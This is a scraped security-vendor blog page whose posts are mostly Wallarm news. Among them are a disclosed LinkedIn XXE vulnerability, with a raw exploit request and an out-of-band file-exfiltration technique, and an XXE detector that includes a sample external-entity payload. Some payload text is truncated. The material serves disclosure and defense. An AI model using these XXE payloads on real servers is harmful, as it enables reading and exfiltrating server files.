New blog location
Hey! We moved our blog to wonderful Medium platform.
Please find it here: https://lab.wallarm.com
@wallarm-lab

New Struts2 Remote Code Execution exploit caught in the wild
New link to this post: https://lab.wallarm.com/new-struts2-remote-code-execution-exploit-caught-in-the-wild-34e52fa8e2
Two days ago Apache published a fix for a new Remote Code Execution vulnerability in Struts2: https://cwiki.apache.org/confluence/display/WW/S2-045
This vulnerability allows an attacker to execute arbitrary Java code on the application server.
We can confirm that we caught the first exploit for this vulnerability in the wild. And this is crazy. Like previous OGNL exploits, this one is also based on OGNL macros to construct and call a shell command via a sequence of Java classes.
CIOReview names Wallarm in “20 Most Promising Enterprise WebApp Solution Providers”
New link to this post: https://lab.wallarm.com/cioreview-names-wallarm-in-20-most-promising-enterprise-webapp-solution-providers-ef8ce86758d7#.4gluu5nqn
We are glad to be short-listed among the Top 20 most promising solution providers for web apps by CIOReview. This is a good illustration of how we are helping enterprises secure their web apps.
The award mainly emphasizes our innovativeness in helping enterprises gain popularity through high-performance web applications.
Wallarm has been recognized as one among the elite group of companies that are featured in the Enterprise Web Application special edition of CIOReview magazine.
“Wallarm is shortlisted to the list of 20 Most Promising Enterprise Web Application Solution Providers 2017 by CIOReview magazine based on its expertise in providing innovative Web Applications and the ability to delight customers and facilitating return on investments through strategic relationships, services and programs,” said Jeevan George, Managing Editor of CIOReview.
Web attacks and vulnerabilities are the common issues faced by the enterprises in their network infrastructure. Wallarm comes up with a next-generation web application firewall and vulnerability scanner integrated in one unique product suite, which provides continuous security for agile teams. Wallarm is the complete solution for blocking attacks and detecting vulnerabilities for the modern web applications and APIs.
About CIOReview
Published from Fremont, California, CIOReview is a print magazine that explores and understands the plethora of ways adopted by firms to execute the smooth functioning of their businesses. A distinguished panel comprising CEOs, CIOs and IT VPs, including the CIOReview editorial board, finalized the “20 Most Promising Enterprise Web Application Solution Providers 2017” and shortlisted the best vendors and consultants.
RSA 2017 Takeaways
New link to this post: https://lab.wallarm.com/rsa-2017-takeaways-576e4e2fc97#.3abd1lgks
Last week Wallarm attended the RSA Conference in San Francisco. The Wallarm booth was quite popular all three days of the show. We got to network with over 300 of our current and future customers. We presented both our next-generation WAF product and our upcoming product for CI/CD application testing, Wallarm FAST.
Wallarm has detected hundreds of vulnerabilities just for the companies who signed up for a free trial of the Wallarm vulnerability scanner during the show.
The show was huge. Walking around both parts of the exhibit center (the show was in both the North and South concourses of Moscone Center) took several hours. We saw a lot of friendly faces from companies like #NGINX.
Interestingly, a whole day of the show was devoted to increasing the security of DevOps with a specialized event called DevOps Connect.
Even though we spent most of our time on the exhibit floor, catching up on the show presentations also provided some interesting insights:
Ransomware + IoT = a very scary situation, as exemplified by a recent case at the San Francisco Trade Authority.
Java.util.rando >
Rick Orloff joins Wallarm advisory board
New link to this post: https://lab.wallarm.com/rick-orloff-joins-wallarm-advisory-board-d4cc8b3471a2#.n3a2u4z6i
We’re happy to announce that Rick Orloff is joining the Wallarm advisory board. Rick will work closely with the team, advising on product and roadmap.
Rick has a successful 20-year track record in security and is currently the Chief Security Officer at Code42. Prior to that he was Vice President and Chief Information Security Officer at eBay, and before that he spent seven years at Apple Inc. He is a member of several advisory boards, including Raytheon Cyber Products, Oracle, Box Inc, FINDO, 802 Secure, and now Wallarm.
As is a tradition for the new members of the advisory board, we asked Rick a few questions about his vision of application security.
Application security has always been hard. How did it become even more complicated in the last few years?
Application security is always difficult and got further complicated as the software developers often developed their code while focusing on product features. Development teams were measured on delivering the feature sets to scope, schedule, and budget. The problem was, security was not one of the core design principles which meant security was addressed as a checkbox approach and not part of the primary workflow. Quite often, the security issues discovered were complicated to correct and placed the DevOps schedule at risk and this introduced friction between the security teams and the DevOps teams. From a customer perspective, this often meant code was released with known issues and the developers were now racing to develop a 1.x.1 security patch.
Could you give your 3-5 take-aways for those enterprises adopting agile/CI/CD to run faster but not willing to sacrifice security?
Teams that follow agile practice with security experts embedded in their development processes developed code faster and more securely than teams that didn’t. In fact, as some of these teams embraced this model, they began including security elements as features. From a product management perspective, adopting an Agile approach means that when DevOps are walking into a Change Control Board meeting, security is already fully baked in and they don’t have to compromise customer security over their product delivery schedule.
What do you like best about Wallarm products/approaches?
Wallarm’s approach takes the meaningful and actionable portions of reviewing the entire technology stack and presents findings truly relevant to the code, systems, or services being used in the technology stack. It moves completely away from the old school theoretical laundry list of findings (could be hundreds or thousands) and presents a relevant rank-stacked list of risks for the developers or site operators to address. In part, by moving away from signature based processing and embracing machine learning and AI, Wallarm results are relevant, focused, and actionable. There’s a huge ROI for Developers and Site Owners enabling them to focus on prioritized findings to the benefit of their customers.

Meet Wallarm at RSA 2017—Introducing Wallarm FAST
New link to this post: https://lab.wallarm.com/meet-wallarm-at-rsa-2017-introducing-wallarm-fast-42df675bd91a#.in1wyiop2
Next week, come visit with Wallarm in San Francisco. We will be exhibiting at the RSA conference, at the north part of Moscone Center, booth #N4825.
Those of you who make it to the show will get a sneak peek of the new product we are working on - Wallarm FAST.
Wallarm FAST will help those working in a CI/CD environment:
increase test coverage
deploy test automation as a service
focus DevSecOps on business logic
Wallarm FAST is designed to be a flexible test environment and to provide Test Automation as a Service. Tests are run from the Wallarm Cloud service, giving DevOps full configuration control without having to worry about environment deployment, scale or flexibility.
Custom policies can be configured for the composition, running and reporting of Test Jobs. Wallarm FAST generates tests using both known attack vectors, such as the OWASP Top 10 and fuzzing, and payload patterns seen in production traffic.
Run policy configuration includes the schedule of the test runs, scan load, and the source and frequency of the scans.
We support the following protocols (including nested protocols) for Deep Request Inspection:
HTTP/2.0
REST
JSON
COMET
XML
SOAP
Base64
GZIP
VIEWSTATE
PHP (unserialize)
Using Wallarm FAST, DevOps and DevSecOps teams can increase security test coverage 100X or more. Moreover, test results for every build are summarized and shown in a single-pane-of-glass dashboard. DevOps managers will now have all the test information at their fingertips.
Can’t get to San Francisco in time but would like to try Wallarm FAST for yourself? Get in touch with us for a demo at [email protected]
We are looking for early adopters!
AI drugs #FridayProject
New link to this post: https://lab.wallarm.com/ai-drugs-fridayproject-5055d2391aa5#.8ywci049s
This is a small Friday project aimed at bringing some fun to those who deal with Neural Networks and got a bit tired of them. The idea is to emulate the impact of alcohol and other substances on a Neural Network. The project outcomes can be interesting. It can also help you measure the stability of your networks, which can be quite useful.
We create many networks and often need to understand how much redundant information is stored inside. How many neurons are not really significantly involved in producing the output? How oversized is our topology for a particular problem? We created NeuralDrugs to answer these questions.
A simple script is available on GitHub and is compatible with TensorFlow models. Enjoy!
# git clone git@github.com:wallarm/neuraldrugs.git
During the first run, you need to enter the path to the model’s meta-file as well as the operation mode. The model file will be changed: some of the weights will have their values altered in a bizarre fashion, which leads to unusual outcomes during computation.
The model where alcohol is interacting with neurons assumes that the blood clots clog the oxygen access to a neuron and it dies off. This can be emulated by putting the minimum possible weight on the neuron (https://en.wikipedia.org/wiki/Short-term_effects_of_alcohol_consumption). The impact of DMA on the neurons is represented by an arbitrary weight on the neuron. Unlike “Alcohol”, such an impact could cause the network to “hallucinate”, i.e. produce unpredictable results.
Let’s check the model’s performance using im2txt, Google’s image detection network. (https://github.com/tensorflow/models/tree/master/im2txt) In our case, it has been taught around 2 million iterations.
Here is the image output of the clean network:
Captions for image wallarm.jpg:
a couple of men standing next to each other . (p=0.001899)
a man and a woman standing next to each other . (p=0.000383)
a couple of men standing next to each other in front of a sign . (p=0.000084)
Now let’s run our Friday project and see what happens. The first parameter is the path to the network’s model, the second is the percentage of the network’s neurons whose weights will be assigned random values.
# ./neuraldrugs.py ./model/train/model.ckpt-1446068 --set_weights_random --dosage 0.05
The results are quite amusing:
Captions for image wallarm.jpg:
a man and woman standing next to angle ornaments . (p=0.001681)
a man and woman standing next to each other . (p=0.000604)
a man and woman standing next to angle ornaments (p=0.000185)
The network’s vision has been diluted and now it sees ornaments where previously it could only see the people and the road sign.
Now let’s increase the dose and check out the result once more:
# ./neuraldrugs.py ./model/train/model.ckpt-1446068 --set_weights_random --dosage 0.07
Captions for image wallarm.jpg:
a a a a man warms a a a a angle dumping warms medal medal . (p=0.001371)
a a a a a man and a a fried a a fried dumping (p=0.000317)
a a a a man warms a a a a angle dumping warms medal (p=0.000254)
Now the network is talking about some dumping which is quite amusing. It also stutters on the article which makes sense for a recurrent neural network.
Now let’s take WaveNet for our next example. WaveNet is a generative neural network architecture for image generation. (https://github.com/Zeta36/tensorflow-image-wavenet) As a learning range, let’s feed the network these photos of an object from different angles:
The machine learning outcome for a clean network looks like some average case of this object. It can be guessed easily by its outline. It is black and white because the image has been restored from the network through the weight of the color contrast neurons. The resolution is only 64x64 because of the convolution but you can see it easily:
Now let’s run our program and see the result:
# ./neuraldrugs.py ./logdir/train/2017-01-24T06-34-00/model.ckpt-58352 --set_weights_random --dosage 0.01
This network consists of 16384 neurons (18 layers with a different number of neurons). Our parameter 0.01 means that 0.01% of the total neuron number will be damaged i.e. only one neuron after rounding. Take a look at the result of the random value weight change with only one random neuron out of 16384 in the network:
Despite the simplicity of the project, it is really helpful in testing finished networks. As a criterion, you can use the number of weights that can be damaged in the network without losing accuracy.
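As an added illustration (not the NeuralDrugs script itself, which rewrites TensorFlow checkpoints), the following pure-Python sketch applies the two damage modes described above to a toy hand-built XOR network and computes the stability criterion just mentioned: how many parameters can be damaged before accuracy drops. The toy network, the reading of “minimum possible weight” as the smallest weight present in the network, and the uniform [-1, 1] range for the random mode are all assumptions of this example.

```python
import random

# Constructed toy network (an assumption of this example, not the im2txt or
# WaveNet models the post experiments on): a 2-2-1 ReLU network whose hand-set
# weights compute XOR exactly. All parameters live in one flat list so that a
# dosage can hit any of them.
#   layer 1: h[j] = relu(W1[j][0]*x[0] + W1[j][1]*x[1] + b1[j])
#   layer 2: y    = W2[0]*h[0] + W2[1]*h[1] + b2
CLEAN_PARAMS = [1.0, 1.0, 1.0, 1.0,  # W1, row-major
                0.0, -1.0,           # b1
                1.0, -2.0,           # W2
                0.0]                 # b2

XOR_DATASET = [((0, 0), 0), ((0, 1), 1), ((1, 0), 1), ((1, 1), 0)]


def forward(params, x):
    """Evaluate the network on one input pair; the predicted label is 1 when y > 0.5."""
    w1, b1, w2, b2 = params[0:4], params[4:6], params[6:8], params[8]
    h = [max(0.0, w1[2 * j] * x[0] + w1[2 * j + 1] * x[1] + b1[j]) for j in range(2)]
    return w2[0] * h[0] + w2[1] * h[1] + b2


def accuracy(params, dataset=XOR_DATASET):
    hits = sum(1 for x, label in dataset if (forward(params, x) > 0.5) == bool(label))
    return hits / len(dataset)


def damage(params, dosage_percent, mode, rng=None):
    """Return a damaged copy. `dosage_percent` is the share of parameters hit,
    given as a percentage like the post's --dosage flag and rounded (so 0.01%
    of 16384 is a single parameter); the victims are chosen uniformly at random.
      mode "alcohol": the parameter is set to the smallest weight in the
        network (this example's reading of "minimum possible weight").
      mode "random":  the parameter gets an arbitrary value in [-1, 1]."""
    if mode not in ("alcohol", "random"):
        raise ValueError(f"unknown mode {mode!r}")
    rng = rng or random.Random(0)
    n_hit = int(round(dosage_percent / 100.0 * len(params)))
    damaged = list(params)
    floor = min(params)
    for i in rng.sample(range(len(params)), n_hit):
        damaged[i] = floor if mode == "alcohol" else rng.uniform(-1.0, 1.0)
    return damaged


def tolerated_damage(params, mode, min_accuracy=1.0, trials=200, seed=0):
    """Stability criterion from the post: the largest number k of damaged
    parameters for which the mean accuracy over `trials` random draws stays
    at or above `min_accuracy`. A minimal network like this XOR net has no
    redundancy, so it tolerates k = 0."""
    rng = random.Random(seed)
    n = len(params)
    best = 0
    for k in range(n + 1):
        draws = (accuracy(damage(params, 100.0 * k / n, mode, rng)) for _ in range(trials))
        if sum(draws) / trials < min_accuracy:
            break
        best = k
    return best


if __name__ == "__main__":
    print("clean accuracy:", accuracy(CLEAN_PARAMS))
    for mode in ("alcohol", "random"):
        print(f"{mode}: tolerates {tolerated_damage(CLEAN_PARAMS, mode)} damaged parameter(s)")
```

On a real model you would replace the toy `forward`/`accuracy` pair with an evaluation of the checkpoint on a held-out set and keep `tolerated_damage` as the metric: a network that keeps its accuracy while many weights are damaged is storing more redundancy than the task needs.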
We invite everyone to test and work on our project! Enjoy your Friday!
Gene Golovinsky joins Wallarm’s advisory board
New link to this post: https://lab.wallarm.com/gene-golovinsky-joins-wallarms-advisory-board-a1fcea8b636#.j6lmbyga0
We’re thrilled to announce that Gene Golovinsky is joining our advisory board. As Director of Security Research and Development at Intuit, he brings an incredible background ranging from large ISVs to startups.
With over 20 years’ experience in technology, Gene has led product and development teams across multiple geographies. He served as VP R&D at Limelight Networks, Chief Architect and Director at Qualys, VP R&D at AlertLogic, and Sr Director at BMC Software. Gene holds an MS degree in Computer Engineering.
Gene will help shape Wallarm products to the needs of Fortune 500 companies. Here are some of his thoughts on why legacy products fail to protect modern web apps.
From your point of view, why is the application security problem not solved yet (with zillions of security products on the market)?
Application security is a rapidly evolving space. New technology stacks are showing up all the time. Most of the AppSec tools and methods are relying on static approaches. From anti-virus to WAFs we rely on things we already know or have seen before. When some new problem or exploit shows up, even the very fast reacting solution needs time to do just that – react. Very few, if any, are actually looking at the business logic and the workflow to understand if this is an attack or if the attack is real. Wallarm has the potential of adapting in near real time. This makes it both technologically intriguing and valuable from the business perspective.
What do you like in Wallarm product and team?
I really like that the product is the evolution of a set of tools coming out of the practical experience of security professionals that were used to help secure real business environments. That helped the team to come up with a flexible and extensible architecture. The founding team has shown eagerness to learn, be flexible and make products better. They truly listen to their customers and take feedback. I am very honored to be joining the team and hope to be a part of the exciting journey that is ahead of Wallarm.
Welcome, Gene!
Wallarm is The Top 25 Fastest Growing Y Combinator Summer 2016 Startups
New link to this post: https://lab.wallarm.com/wallarm-is-the-top-25-fastest-growing-y-combinator-summer-2016-startups-8096ab99584e#.ygxzc1s3r
Wow! Wallarm is one of the top 25 fastest growing Y Combinator (S16 batch) companies, according to the Mattermark research.
Mattermark ranked this batch of Y Combinator and found companies with the highest Mattermark Growth Score. Mattermark's Growth Score measures how quickly a company is gaining traction at a given point in time.
Mattermark was launched in 2012 as a data platform for VCs with hopes of becoming the go-to software for firms to use when quantifying signals of growing and potentially lucrative startups.
Thanks guys!
Critical LinkedIn vulnerability proactively resolved by Wallarm (XXE in application server)
New link to this post: https://lab.wallarm.com/critical-linkedin-vulnerability-proactively-resolved-by-wallarm-xxe-in-application-server-239bba28e415#.lgprax5d5
With all the time and resources we allocate to finding application vulnerabilities it’s easy to forget that 3rd party libraries and software can introduce vulnerabilities into our applications as well. Hackers know this and they try to exploit them. In this blog post we will illustrate a vulnerability found within one of the LinkedIn services. The security issue was discovered in December 2015 and was fixed within 24 hours by the LinkedIn team.
What is XXE
OWASP says: “An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser.”
So an XXE vulnerability is not truly a developer mistake but rather a misconfiguration of the XML parser.
If you are not familiar with XML External Entities, we suggest referring to the XML RFC. It is also well worth your time to read the dedicated OWASP page.
The impact of XXE vulnerabilities is severe. They allow reading local files on remote servers, running queries into internal networks, and in some cases even executing code remotely.
XXE in an application server
An even more complicated situation is where a vulnerability is not introduced in your code, but in the web server or application server you use.
A good example here is an old vulnerability in the SOAP server Apache CXF. The unsafe initialization was introduced inside the Apache CXF library, so application developers had no control over how the XML parser was initialized. As a quick bug fix, the Apache CXF maintainers proposed that developers redefine the XML parser in a safe way themselves. In that case it was possible — but what if you have such a vulnerability in the code of the web server itself?
This is exactly the case with the critical LinkedIn service vulnerability discovered by Wallarm security researcher, Anton Lopanitsyn.
Vulnerability in LinkedIn
LinkedIn Marketing Solutions is a B2B product for marketing within the social network. After a simple check, it turned out that the web server parses all XML documents passed within HTTPS requests. Parsing happens even before control is passed to the web application itself, so it was functionality of the application server.
As a result, it was possible to send XML documents to any web server URL, which could result in the XXE vulnerability being exploited. This is an example of a request to the root page which allowed reading the local file /etc/motd:
POST / HTTP/1.1
Content-type: blabla/xml
Host: signin.lms.linkedin.com
Content-Length: 204
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Wallarm-bot
Accept: */*

%asd; %rrr; ]> 123
The content of xxe.dtd:
'>%c;
In the XML file, a special out-of-band (OOB) technique was used for reading the file content and transmitting it to an FTP server. You can get more details on this technique in this article.
Wallarm reported this vulnerability to the LinkedIn Security Team on December 12th and received an initial response within two minutes. The vulnerability was fixed within a 24-hour turnaround.
Protection against XXE
Obviously, organizations can do little if a vulnerability occurs in 3rd-party libraries or in the application server.
In this case, you need to use a WAF (Web Application Firewall) which analyzes all HTTP requests and blocks those carrying malicious payloads.
However, there is one complication: a WAF needs full support for parsing XML documents to provide actual protection against XXE vulnerabilities. It may seem that an organization just needs a few regular expressions to analyze requests. However, XML documents can be transmitted in a different encoding, e.g. UTF-16, and attempts to mitigate via regular expressions will then fail.
Wallarm parses all XML content to detect XXE attacks. Furthermore, Wallarm can discover XXE vulnerabilities with a built-in fuzzer. You can try it now for free at https://wallarm.com.
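To make the encoding point concrete, here is an added example (not Wallarm’s own detection code) of the difference between matching a regular expression on raw request bytes and first decoding the body the way an XML parser does: BOM, then the byte pattern of a BOM-less UTF-16 `<`, then the declaration’s `encoding` attribute. The sample bodies, including the host name `dtd-host.example`, are constructed for the example.

```python
import codecs
import re

# Constructed sample request bodies (not LinkedIn traffic): one document that
# declares an external parameter entity, in three byte encodings, plus a
# benign document with no DTD at all.
XXE_DOC = ('<?xml version="1.0"?>'
           '<!DOCTYPE data [<!ENTITY % ext SYSTEM "http://dtd-host.example/xxe.dtd"> %ext;]>'
           '<data>123</data>')
BENIGN_DOC = '<?xml version="1.0"?><data>123</data>'

SAMPLES = {
    "utf8": XXE_DOC.encode("utf-8"),
    "utf16_bom": XXE_DOC.encode("utf-16"),       # BOM followed by the UTF-16 body
    "utf16_nobom": XXE_DOC.encode("utf-16-le"),  # no BOM; only the byte pattern of '<' gives it away
    "benign": BENIGN_DOC.encode("utf-8"),
}

_DECL_ENCODING = re.compile(rb'<\?xml[^>]*?encoding=["\']([A-Za-z0-9._-]+)["\']')


def decode_xml_body(body: bytes) -> str:
    """Pick the encoding the way an XML parser would: BOM first, then the byte
    pattern of the leading '<' for BOM-less UTF-16, then the encoding attribute
    of the XML declaration, and UTF-8 as the default."""
    if body.startswith(codecs.BOM_UTF8):
        return body.decode("utf-8-sig")
    if body.startswith((codecs.BOM_UTF16_LE, codecs.BOM_UTF16_BE)):
        return body.decode("utf-16")
    if body[:2] == b"<\x00":
        return body.decode("utf-16-le")
    if body[:2] == b"\x00<":
        return body.decode("utf-16-be")
    m = _DECL_ENCODING.match(body)
    encoding = m.group(1).decode("ascii") if m else "utf-8"
    return body.decode(encoding, errors="replace")


_DOCTYPE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
# Any entity declaration with a SYSTEM or PUBLIC identifier, parameter entities (%) included.
_EXTERNAL_ENTITY = re.compile(r"<!ENTITY\s+(?:%\s*)?[^\s>]+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE)


def naive_byte_check(body: bytes) -> bool:
    """The regex-on-raw-bytes approach the post warns about: it never sees a
    contiguous '<!ENTITY' in a UTF-16 body because every character is two bytes."""
    return re.search(rb"<!ENTITY", body, re.IGNORECASE) is not None


def classify_xml_request(body: bytes) -> str:
    """Decode first, then decide: 'block' for a document declaring external
    entities, 'review' for any other DTD, 'allow' otherwise."""
    text = decode_xml_body(body)
    if _EXTERNAL_ENTITY.search(text):
        return "block"
    if _DOCTYPE.search(text):
        return "review"
    return "allow"


if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(f"{name:12s} naive={naive_byte_check(body)!s:5s} decoded={classify_xml_request(body)}")
```

Run stand-alone, the script shows the naive check catching only the UTF-8 sample while the decode-first classifier blocks all three encodings of the same document and allows the benign one. A production filter would also have to deal with gzip-compressed bodies and XML nested inside other formats, which is what the post means by full XML parsing support.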
PS Be aware that LinkedIn does not have a public bug bounty program!

New link to this post: https://lab.wallarm.com/ah-ha-we-like-this-much-1fd1b5f11b6d#.yz6e9abqn
Ah-ha, we like this much. sqlmap, the incredibly popular tool that automates the process of detecting and exploiting SQL injection flaws, is now able to identify applications and APIs protected by Wallarm.
When a WAF is detected, sqlmap even proposes to activate tamper scripts and try to bypass the security checks. But as Wallarm doesn’t use regular expressions for attack detection and relies instead on statistical profiles, it won’t help, sorry :)
Thanks @stamparm. Appreciate this much!
NGINX survey: Overall, 57% of organizations use a WAF
New link to this post: https://lab.wallarm.com/nginx-survey-overall-57-of-organizations-use-a-waf-b59e87803a5d#.og0mqzwco
NGINX is the heart of the modern web. The NGINX team used their unique position in the marketplace to survey technology professionals about their thoughts and perceptions of both the current state and the future of application development and deployment.
According to the survey, the most popular technique for improving security and protecting against data breaches is to install a web application firewall (WAF). Overall, 57% of organizations use a WAF. Among smaller companies WAF usage was even higher, up to 69%. Infrastructure anti-DDoS (at Layers 2 and 3) is gaining popularity in small and medium organizations as well, whereas a higher percentage of large companies are using anti-virus.
Please find a full text of this great report here.
We are proud to sponsor Plaid CTF this year
Wallarm has been actively supporting CTFs for many years, helping both teams and organizers improve the CTF community. This year is no exception: we are proud to sponsor Plaid CTF.
PlaidCTF is an annual computer security competition created by the Plaid Parliament of Pwning (PPP). This competition is played by hundreds of information security professionals and students every year from around the world online over a 48-hour period. Participants compete in a variety of challenges in order to showcase their computer security skills and compete for valuable cash prizes. In addition, PlaidCTF is one of just 10 competitions that can qualify teams to participate at the 2016 DEF CON CTF in Las Vegas.
You can still sign up! Hurry up, it’s the final countdown!
We are thrilled to announce a new release of Wallarm Node™. It’s a brand-new version of the Wallarm filter instance (NGINX-based), with new features and a host of optimizations.
Significant refactoring has resulted in improved performance. Optimizations were made to provide sophisticated security checks with near-zero latency. This has been a critical request for our customers with massive-load applications.
The Wallarm Node 2.0™ release introduces support for the WebSocket protocol. We believe Wallarm™ to be the very first web application firewall (WAF) with full WebSocket support. We continue to address new threats for the modern web: the filter instance is now capable of detecting and blocking attack payloads within the WebSocket protocol. Additional optimizations were done for popular WebSocket-based frameworks such as ASP.NET SignalR and Socket.io. To enable attack detection for WebSockets, use the wallarm_parse_websocket on directive in a location section, or apply it to the whole server in the NGINX configuration file.
Wallarm Node 2.0™ implements enhanced analysis of XML-based data to provide better protection for applications and APIs (SOAP, etc.). This change is especially valuable as we observe an increasing number of attacks targeting XXE vulnerabilities.
Wallarm Node 2.0™ is now even easier to configure. We eliminated the troublesome shm_size parameter, so there is no longer any need to set up the size of the local blocking ruleset; everything is done automatically. We listen to our customers and we know how much it bothered you before!
To upgrade to Wallarm Node™, just update your nginx-wallarm package with your Linux package manager or use the updated Docker container which is available at Docker Hub.
Grab a moment and catch Wallarm CEO Ivan Novikov at SyScan 360, which is about to start in hot Singapore. His talk, “Key-value injections here!”, will be on the second day of the conference.
This paper is a continuation of the memcached injections research presented at BlackHat USA 2014.
The paper presents two main areas of research: input validation vulnerabilities in key-value clients for popular platforms (C, Java, Lua, Node.js, PHP, Perl, Python and Ruby) and vulnerabilities inside the storage engines themselves. Special attention is paid to the sandboxes inside these services.
As a result, the author found a way to do something like “SQL injection attacks”, but for key-value storages. In practice such an attack leads to effects ranging from authentication bypass to execution of arbitrary interpreter code. It is a real-world problem, found during security audits and present in various popular web applications.
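The client-side input validation the paper refers to, as an added example that is not from the paper or from any of the clients it audited: the memcached text protocol separates command fields with spaces and terminates commands with CRLF, and its key rules (at most 250 bytes, no whitespace, no control characters) are exactly what a client must enforce before it interpolates a user-controlled key into a command. The helper names and sample keys here are constructed for the example.

```python
import re

# Memcached text-protocol key rules: at most 250 bytes, and no whitespace or
# control characters. Space and CRLF are the command delimiters, so a key
# containing them can turn one command into several; that is the key-value
# analogue of SQL injection, and validating the key is the client's job.
MAX_KEY_BYTES = 250
_FORBIDDEN = re.compile(rb"[\x00-\x20\x7f]")


def validate_memcached_key(key: str) -> bytes:
    """Return the key as bytes if it is protocol-safe, otherwise raise ValueError."""
    raw = key.encode("utf-8")
    if not raw:
        raise ValueError("empty key")
    if len(raw) > MAX_KEY_BYTES:
        raise ValueError(f"key is {len(raw)} bytes, limit is {MAX_KEY_BYTES}")
    bad = _FORBIDDEN.search(raw)
    if bad:
        raise ValueError(f"key contains forbidden byte 0x{bad.group(0)[0]:02x} at offset {bad.start()}")
    return raw


def is_safe_key(key: str) -> bool:
    try:
        validate_memcached_key(key)
        return True
    except ValueError:
        return False


def build_set_command(key: str, value: bytes, flags: int = 0, exptime: int = 0) -> bytes:
    """Serialise one `set` command. The key is validated; the value needs no
    escaping because the protocol length-prefixes it, so delimiter bytes inside
    the value are read as data rather than as the start of a new command."""
    raw_key = validate_memcached_key(key)
    return b"set %s %d %d %d\r\n%s\r\n" % (raw_key, flags, exptime, len(value), value)


if __name__ == "__main__":
    for candidate in ("session:42", "user 42", "a\r\nb", "a" * 251):
        print(repr(candidate[:20]), "->", "ok" if is_safe_key(candidate) else "rejected")
    print(build_set_command("session:42", b"hello"))
```

The same shape applies to the other clients in the paper’s list: whatever the language, the fix is a whitelist check on the key bytes at the client boundary, not a blacklist of known-bad strings.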

This week (March 15-17) the first and foremost world-class technology conference in the hosting and cloud services industry, WHD.global, is taking place in Rust, Germany. The trade show, established 12 years ago, brings more than 6,000 leading experts and insiders together for high-value networking, informative discussions, and shared experiences. Exhibiting companies include Acronis (a Wallarm partner), Dell, HP, Lenovo, Odin, AMD, Samsung, and Microsoft.
Wallarm, the leading provider of cloud-capable Web Application Security solutions for enterprises and service providers, will also be present. If you are interested in learning about our product, how it’s different from traditional WAFs, or in seeing an online demo, please contact our VP Sales (EMEA) Stephan Masyuta-Hesslich at [email protected].
These stickmen besieging the castle help us to explain why enterprises need to switch from old-fashioned web application firewalls to Wallarm